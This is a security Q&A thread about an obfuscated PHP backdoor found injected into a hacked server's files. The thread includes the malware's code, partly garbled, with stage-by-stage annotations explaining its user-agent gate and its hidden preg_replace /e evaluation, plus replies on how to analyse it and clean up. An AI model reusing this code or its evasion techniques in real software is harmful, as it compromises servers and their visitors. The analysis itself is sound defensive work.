
Recently I had a shared hosting server that was hacked; the following line of code was injected at the top of every PHP file on the server:

<?php
/* Reviewer annotation -- stage 0 (gate).
   The escaped identifiers decode to: $GLOBALS["anuna"], $_SERVER["HTTP_USER_AGENT"],
   "msie" and "rv:11".  If the lower-cased User-Agent contains NEITHER substring,
   $GLOBALS["anuna"] is set to 1.  The code reassembled further down appears to be
   wrapped in `!isset($GLOBALS["anuna"])` (the guard is visible as a fragment of the
   blob just before the "function_exists" text), so the second stage is skipped for
   anything that does not look like Internet Explorer / IE11.  That is presumably why
   "view source" from an ordinary browser shows nothing unusual.  The $_SERVER lookup
   is unguarded (a missing User-Agent header raises a notice); pieces of
   `@error_reporting(0)` are visible in the blob. */
if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php
/* Reviewer annotation -- stage 1 (carrier blob).
   $pyyhlxfwxr is one ~10 KB single-quoted string (garbled/truncated in this paste,
   so it cannot simply be re-run from here).  Most of it is filler; the real program
   is cut out of it by the (offset,length) pairs in $peyjqdmyjs below.  Readable
   fragments give away the encoding: `fjfgg($n){return chr(ord($n)-1);}` is a
   shift-by-one decoder, and tokens such as "osvufs" / "ftmbg" / "opjudovg" are
   "return" / "false" / "function" reversed with every byte +1 (e.g. strrev("osvufs")
   shifted by -1 is "return").  Also visible inside the blob: a second
   `preg_replace("%x2f%50%x2e%52%x29%57%x65", ...)` whose pattern becomes "/(.*)/e"
   once the '%' -> '\' substitution performed below turns %xNN into PHP \xNN escapes,
   and `$GLOBALS["%x61%156%x75%156%x61"]=1` (again "anuna").  The literal tail of the
   string, `/(.*)/epreg_replaceofqxosjrru`, is what the two substr() calls below pick up. */
$pyyhlxfwxr = '!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x78%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdX%x7825)m%x5c%x7825):fmji%x5c%x7878:5%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x782)#]341]88M4P8]37]278]225]241]334]36vg}k~~9{d%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:60SFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!<b%860opjudovg)!gj!|!*msv%x5c%x787825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>!%x5c%x7825ww2)%x5c%x78251]y33]68]y34]68]y33]824)#P#-#Q#-#B#-#T#-#E#-{hA!osvufs!~<3,j%x5c%x7825>166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141%x72%1U,6<*27-SFGTOBSUOSVUFS,6<*x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x78255fdy>#]D4]273]D6P2L5%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##QtpzpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f<u%x5c%x7825 fjfgg($n){return chr(ord($n)-1);} @error_repo5)}.;%x5c%x7860UQPMSV25i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTQc5-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#y%x5c%x7825,3,j%x5c%x7825>jx5c%x7824y7%x5c%x7824-%x5c%x7824*<!%x5c%x7824-%x5c%x7824gps25)fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvc%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x#M5]DgP5]D6#<%x5c%x7829%73", NULL); 
}6197g:74985-rr.93e:5597f-s.973:c%x785c}X%x5c%x7824<!%%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%xy>#]D6]281L1#%x5c%x782f%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x78%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x7824-%x5x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x782x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7865]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]62]y3:]84#-!OV78W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%yfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of25)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmq%x7825)ftpmdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfsf5d816:+946:ce44#)zbssb!>!ss6~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x78257-C)j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%5!|!*!***b%x5c%x7825)sf%x5c%msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c323ldfid>}&;!osvufs}%x5c%x787f;!opjudo825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osvc%x7825yy)#}#-#%x5c%x7824-%x5c%x7824%x5c%x7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)cnbs+yfeobz+sfwjidsb%xMM*<%x22%51%x29%51%x2H,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#|:7#6#)tutjyf%x5c%x7860439275ttfsqnr%x5c%x7878Bsfuvso!sGLOBALS["%x61%156%x75%156%x61"]=1; 
function%x782f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq7825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>Uc%x7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}334}4%x5c%x7825t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]2751<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,%xy7d]252]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]2M*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c34]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe))1r#%x5c%x785cq%x5c%x78257%x5cx5c%x7825tzw>!#]y76]277]y72]265]y39]274]y85]273]y6g]273]y76]271]y75c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x782787f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuo7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~f%163%x74%141%x72%164"22)gj!|!*nbsbq%x5c%x7825x7827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c3]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]44fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5fepmqnjA%x5c%x7827&6<.fmjjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%x78%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5e{h+{d%x5c%x7825)+opjudovg+)!gj+A6|7**197-2qj%x5c%x782562%x61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%1tussfw)%x5c%x7825zW%x5c%x7825h>Ez>%x5c%x782272qj%x5c%x7825)7gj6<**2r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7825=*h%x5cx5c%x7825)sutcvt)!gj!|!*bubE{h%x5-%x5c%x7825hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtjw)#]82#-#!#-%x527u%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fu5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%x7824b!>!%x5%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5cbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7#zsfvr#%x5c%x785cq%x5c%x7825%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJgj<*#k#)usbut%x5c%x7860cepn)%x5c%x7825bss-%x5c%x78w%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x7825j:>1<%x5c%x7825j:=t53]Kc]55Ld]55#*<%x5c%x7825bG
9%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::5c%x7825%x5c%x787f!~!<##!>!2p%x{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!#>.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%4-%x5c%x7824*!|!%x5c%x78245c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>78e%x5c%x78b%x5c%x7825w:!>!%x5c7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c6f+9c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq5c%x7825t::!>!%x5c%x7824Ypp3)%x55c%x7825b:<!%x5c%x7825c:>%]28y]#%x5c%x782fr%x5c%x7825%x5c%xx78257>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x78c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5cf+*0f(-!#]y76]277]y72]265]y39]271]y83]2}!+!<+{e%x5c%x7825+*!*+fepdfy]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5825tzw%x5c%x782f%x5c%x7-bubE{h%x5c%x7825)sutcvt)fubmgoj~!dsfbuf%x5c%x7860gvodujpo)##-!#~<#%x5c%<##:>:h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7e:55946-t%x78256<%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x62%x5f%163%x70%154%x69%164%50%x2225)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%x7825%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5cD2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5rting(0); 
preg_replace("%x2f%50%x2e%52%x29%57%x65","%x65%d]252]y74]256]y39]252]y83]273822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepcboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x78x7878pmpusut!-#j0#!%x5c%x782f!**#sfmc%x7824gvodujpo!%x5c%x7824-%}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<*#}_;#)782fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:%x7878pmpusut)tpqssutRe%x5c%x::::-111112)eobs%x5c%x7860un>qp%x5V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{fpo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c)%x5c%x7825j>1<%x5c%x7c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tut]y7:]268]y7f#<!%x5c%x7%x5c%x7878:-!%x5c%x7<#16,47R57,27R66,#%x5c%x782fq%x5c%x7825>2q%xgps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825wpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVM75]y83]273]y76]277#<w6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f#00;quui82f2986+7**^%x5c%x782f%x5c%x7825r%x5c%xc%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%25w6Z6<.3%x5c%x7860hA%x5*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c7-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubf7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x785cq%x5c%x78257**^r.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]x5c%x7825%x5c%x787f!<X>b%xif((function_exists("%x6f%142%x5j{fpg)%x5c%x) && (!isset($GLOBALS["%x61%156%x75%156%x61"])))) { 
$x5c%x7825%x5c%x7824-%x5c%x7824y4%xsutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%xD!-id%x5c%x7825)uqpuft%x5c%x5)s%x5c%x7825>%x5c%x782fh%5c%x787fw6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x5c%x7825<#g6R85,67R37c%x7825!|Z~!<##!>!2p%x5c%x78253]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yb%x5c%x7825!**X)ufttj%x5c%x78)323ldfidk!~!<**qp%x5x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x7256]y81]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]2]y72]282#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x785c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x78672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]3851]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x7%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7860ft%134%x78%62%x35%165%x3a%146%x21%76%x21%50%x5,18R#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%8297f:5297e:56-%x5c%x7878r.985:52985-t.98]K45c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782fc%x7825tmw)%x5c%x7825tww**WYsbogA%x5c%x7827doj%x5c%x78256<%x5c%x787fufs:~:<*9-1-r%x5c%x782ppde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223c%x7827pd%x5c%x78256<pd%x5c-%x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%xx5c%x7825:<**#57]38y]47]67y]37]88y]27#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv}A;~!}%x5c%x787f;!|!}{;)g!*72!%x5c%x7827!hmg%x5c%5)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x782556]y78]248]y83]256]y81]265]y72]254]y76]6P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]fuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%Oc%x5c%x782f#00#W~!Ydrr)%x5c%x7825QwTW%x5c%x7825hIr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^pdov{h19275j{hnpd19275!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofm5]43]321]464]284]364]6]27f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825j}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5c
%x7827{**u%x5c%x78225r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:25%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#otmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%xjs%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%sbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{6825j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqm+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x78>2bd%x5c%x7825!<5h%x5c%x7825%xsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257w2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825z>>28]322]3]364]6]283]427]36]373P6]36]73]8x5c%x7825ggg)(0)%x5c%x78272%x5c%x7824<!%x5c%x7825mm!>!#]y81]273]y76]258]y6g]273]y76]271]/(.*)/epreg_replaceofqxosjrru'; $peyjqdmyjs = explode(chr((183-139)),'7333,32,3252,22,7391,53,2462,43,792,46,5856,57,512,57,3749,48,3797,22,5642,33,8280,44,1091,54,4812,31,5820,36,4148,59,1382,42,6915,24,8658,27,1235,65,6863,52,3298,69,5085,46,4030,65,9611,41,8800,49,56,64,3726,23,7056,37,7093,54,9876,44,3852,34,7937,65,1046,45,2999,28,2505,40,5721,49,7238,21,4264,28,4958,36,8231,49,9652,66,1895,48,3516,25,8553,37,6728,37,2873,57,1820,47,4292,36,569,26,2105,44,5578,64,7578,55,3137,53,9073,53,1485,48,838,21,7524,28,7147,53,0,56,9297,63,343,30,5675,46,5379,32,485,27,1943,64,9360,38,8874,24,595,66,9235,38,960,27,2274,45,7478,46,3093,44,8898,70,1684,32,3932,33,6441,40,3541,44,4547,31,8002,65,1769,51,1716,53,9846,30,6765,59,4639,63,7200,38,4498,49,6290,34,7654,29,2077,28,6047,36,2319,22,8461,61,3367,57,6261,29,4843,58,1867,28,4207,57,3585,49,293,50,7307,26,4766,46,7728,29,3274,24,7757,21,5131,51,1533,52,9515,48,6360,59,6160,54,2149,38,233,60,2407,35,9213,22,3476,40,8612,46,5259,28,3694,32,4578,61,4328,24,738,54,6324,36,9563,48,2545,52,6523,44,7633,21,8324,55,7778,62,5942,63,8849,25,9398,64,899,61,3634,60,1213,22,3027,66,5913,29,7888,49,7840,48,6708,20,2649,63,6481,22,2187,51,8590,22,7552,26,8731,37,5052,33,6214,47,3886,46,120,35,5451,63,8067,68,5287,69,2597,52,10043,63,2773,52,155,43,4702,26,8685,46,4095,53,2238,36,2007,
70,7444,34,7019,37,1424,61,6083,28,987,59,6419,22,9718,46,5411,40,9764,43,6610,40,8135,55,4994,32,4901,57,9807,39,859,40,9126,34,2442,20,6005,42,1649,35,3819,33,2362,45,9160,53,3965,65,8522,31,4352,26,9462,53,1182,31,8417,44,5514,64,7259,48,7683,45,1359,23,1145,22,661,20,9008,65,5770,50,4469,29,6111,49,3190,62,681,57,198,35,9980,38,3424,52,9273,24,2930,69,8190,41,6824,39,8379,38,5182,38,4444,25,7365,26,373,43,2712,61,5026,26,1300,59,4728,38,6567,43,9920,60,6939,36,416,25,4378,66,6503,20,5356,23,461,24,8768,32,6650,58,2825,48,6975,44,10018,25,5220,39,8968,40,441,20,1585,64,2341,21,1167,15');
/* $peyjqdmyjs: chr(183-139) = chr(44) = ','  ->  a flat list of (offset, length) pairs into
   $pyyhlxfwxr.  The pair that reaches furthest, (10043,63), ends exactly at offset 10106,
   which is where the first substr() below starts cutting. */
/* substr($pyyhlxfwxr, 63563-53457 = 10106, 37-30 = 7): by the visible tail of the blob
   ("/(.*)/epreg_replace...") this yields the pattern "/(.*)/e".  The offsets cannot be
   re-checked against this garbled paste, only against the tail. */
$rcwmfpxjbs=substr($pyyhlxfwxr,(63563-53457),(37-30));
/* djbxmtkyiw(pairs, blob): for each (offset, length) pair, append substr(blob, offset, length);
   i.e. it reassembles the hidden program out of the carrier string. */
if (!function_exists('djbxmtkyiw')) { function djbxmtkyiw($siiigmplqz, $jcodtyjdch) { $vqvamvvnqx = NULL; for($ttgvvqxcls=0;$ttgvvqxcls<(sizeof($siiigmplqz)/2);$ttgvvqxcls++) { $vqvamvvnqx .= substr($jcodtyjdch, $siiigmplqz[($ttgvvqxcls*2)],$siiigmplqz[($ttgvvqxcls*2)+1]); } return $vqvamvvnqx; };}
// $odgmnprvdj (hex/octal escapes decoded) is the replacement string:
//   " /* rvkhsencqs */ eval(str_replace(chr((257-220)), chr((381-289)), djbxmtkyiw($peyjqdmyjs,$pyyhlxfwxr))); /* totqyapxfe */ "
// chr(37) = '%' and chr(92) = '\', so every '%' in the reassembled text becomes '\' (turning
// the %x5c / %x78.. sequences into PHP \x escapes) and the result is passed to eval().
$odgmnprvdj="\x20\57\x2a\40\x72\166\x6b\150\x73\145\x6e\143\x71\163\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\65\x37\55\x32\62\x30\51\x29\54\x20\143\x68\162\x28\50\x33\70\x31\55\x32\70\x39\51\x29\54\x20\144\x6a\142\x78\155\x74\153\x79\151\x77\50\x24\160\x65\171\x6a\161\x64\155\x79\152\x73\54\x24\160\x79\171\x68\154\x78\146\x77\170\x72\51\x29\51\x3b\40\x2f\52\x20\164\x6f\164\x71\171\x61\160\x78\146\x65\40\x2a\57\x20";
/* substr($pyyhlxfwxr, 31614-21501 = 10113, 70-58 = 12): the 12 bytes right after the pattern;
   by the visible tail of the blob this is the function name "preg_replace". */
$pjegxnbdlt=substr($pyyhlxfwxr,(31614-21501),(70-58));
/* Execution point.  This is preg_replace("/(.*)/e", <the eval(...) wrapper above>, NULL).
   The /e modifier makes preg_replace() evaluate the replacement as PHP code, so the hidden
   program runs here even though the word "eval" never appears in the file as written.
   /e was removed in PHP 7.0; on a modern interpreter this stage fails. */
$pjegxnbdlt($rcwmfpxjbs, $odgmnprvdj, NULL);
/* Clean-up / decoy: overwrite the working variables with junk values. */
$pjegxnbdlt=$odgmnprvdj; $pjegxnbdlt=(391-270); $pyyhlxfwxr=$pjegxnbdlt-1; ?>

Of course I am in the process of taking the server offline and trying to figure out how it was hacked, but I would like to figure out what this PHP code does. When I visit the hacked pages and view source, nothing seems out of the ordinary; it doesn't seem to be putting anything visible to visitors into the hacked pages. Online deobfuscators that I tried failed with this sample, though my virus scanner picks it up as a backdoor. Any ideas?

  • Have you seen [this](http://security.stackexchange.com/q/70579/9312) question? It looks similar. – Question Overflow Mar 25 '15 at 16:10
  • @QuestionOverflow Thanks, that link was very helpful. Do you think it is likely that the code sample here (if unobfuscated) would be similar to the one you posted, or could it be a completely different backdoor just obfuscated in a similar manner? The apache log does seem to show attempts to exploit the MailPoet plugin, but apache returned code 200 for those attempts rather than the 302, the code that sample logs I found online show. I also didn't find any attempts to access the themes folder. – tlng05 Mar 26 '15 at 02:03
  • Looking at the structure, it is most likely the same [polymorphic code](http://en.wikipedia.org/wiki/Polymorphic_code) encoded differently to evade signature detection. This injected code is the payload stage, not the entry point; the entry point (the actual backdoor / initial access) is likely the vulnerable plugin. You could edit your question to include the relevant access-log lines so that others may be able to help you. – Question Overflow Mar 29 '15 at 12:18



A hex decoder will clean up the `\x` escapes, which helps (the first segment, for example, decodes to a check on `$_SERVER["HTTP_USER_AGENT"]` that sets `$GLOBALS["anuna"]` unless the browser identifies as MSIE/IE11), but to decode the rest you need to actually run it in PHP, because it's designed to decode itself. If you carefully pull apart the statements in there and run them one by one, take care never to execute an `eval` or anything equivalent — note that in this sample the final stage is `preg_replace()` with the `/e` modifier (the pattern `/(.*)/e` and the function name `preg_replace` are cut out of the tail of the blob with `substr()`), which evaluates its replacement string as PHP, so grepping for the literal word `eval` is not enough. Replace that evaluation step with `print` to see what the decoded program code is, then decide whether that is safe to run.

I don't recommend doing so unless you know PHP and have a throwaway VM or workstation that is off the network and can be wiped afterwards (the `/e` modifier this sample relies on was removed in PHP 7, so a modern interpreter will refuse that step anyway). It's an ambitious enough project that I wouldn't bother; you don't need to do all that to know it's malicious code — the user-agent gate, the hex-obfuscated identifiers and the self-decoding blob are enough — and the cleanup is the same either way: restore from a known-good backup, rotate every credential, and patch the entry point.

If you're just curious, then that's different. Have fun. But decoding it is a straightforward programming exercise, and you might get better help on other stacks.
